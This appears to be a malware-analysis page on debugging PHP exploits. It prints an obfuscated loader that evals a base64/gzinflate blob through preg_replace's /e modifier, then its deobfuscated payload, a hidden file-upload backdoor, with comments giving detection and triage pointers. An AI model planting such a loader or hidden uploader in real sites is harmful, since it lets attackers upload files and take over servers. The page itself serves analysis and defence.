
Debugging exploits

Example exploit

Obfuscated code

<?php
// Loader stage of the sample. Nothing here is functional beyond unpacking and running a payload.
//
// How it executes:
// - The pattern "/.*/e" uses the PCRE "e" (eval) modifier, which makes preg_replace() run the
//   replacement string as PHP code. The subject is the empty string, so the call exists only to
//   trigger that evaluation.
// - The "e" modifier was deprecated in PHP 5.5 and removed in PHP 7.0, so this loader only runs on
//   older interpreters.
// - The replacement is a double-quoted string, so PHP resolves the \xNN escapes before
//   preg_replace() sees it. They spell out: eval(gzinflate(base64_decode('...')));
//   i.e. the single-quoted blob is Base64 text holding raw-DEFLATE-compressed PHP source.
// - The blob continues on the next physical line; base64_decode() in its default mode skips
//   characters outside the Base64 alphabet, so the line break does not change the decoded bytes.
//
// Review pointers:
// - Static indicators in this statement: preg_replace() with an "e"-modified pattern, a long run of
//   \xNN escapes in a string argument, and the decoded eval/gzinflate/base64_decode chain.
// - To inspect the payload, decode and inflate the blob as data (no eval) in an isolated
//   environment; the "Deobfuscated code" listing on this page shows the result of that step.
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'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'\x29\x29\x29\x3B","");
?>

Deobfuscated code

// Decoded payload as printed by the deobfuscation step. This listing is tool output, not runnable
// PHP: the double-quoted argument below contains unescaped double quotes.
//
// Wrapper lines:
// - $a and $b are set to the function names "base64_encode" and "gzdeflate"; neither variable is
//   read anywhere in the lines shown.
// - NOTE(review): dfjaqw87561() is not defined on this page. It is presumably a helper from another
//   layer of the sample or a placeholder left by the tool; confirm against the full file.
//
// What the embedded code does (a minimal file uploader):
// - The upload branch runs when the POST field 'Submit' is set.
// - The file from the 'image' field is moved with move_uploaded_file() to $filedir . <name sent by
//   the client>. $filedir is the empty string, so the destination is a relative path using the
//   client-supplied file name as-is.
// - No check on extension, content type or size is made; $maxfile is assigned but never read.
// - The '@' operator hides any error from the move, and "Done ==> ..." is echoed whether or not the
//   move succeeded. The file name is echoed without HTML escaping.
// - Without the 'Submit' field, the script emits an upload form wrapped in a div with
//   id "feedback_suggestions" and style "display:none", so this branch renders nothing visible.
//
// Triage pointers:
// - Web logs: multipart/form-data POST requests to the URL of the file carrying this code.
// - File system: files created next to the script shortly after such requests (the relative
//   destination typically resolves to the script's directory under a web SAPI; verify per host).
// - Content search: the literal id "feedback_suggestions" together with move_uploaded_file() in a
//   file that has no legitimate upload role.
$a = "base64_encode";$b = "gzdeflate";
            eval(dfjaqw87561("?><?php
if(isset($_POST['Submit'])){
    $filedir = "";
    $maxfile = '2000000';

    $userfile_name = $_FILES['image']['name'];
    $userfile_tmp = $_FILES['image']['tmp_name'];
    if (isset($_FILES['image']['name'])) {
        $abod = $filedir.$userfile_name;
        @move_uploaded_file($userfile_tmp, $abod);

echo"<center><b>Done ==> $userfile_name</b></center>";
}
}
else{
echo'
<div id="feedback_suggestions" style="display:none"><form method="POST" action="" enctype="multipart/form-data"><input type="file" name="image"><input type="Submit" name="Submit" value="Submit"></form></div>';
}
?>"));


?>

Tools for deobfuscation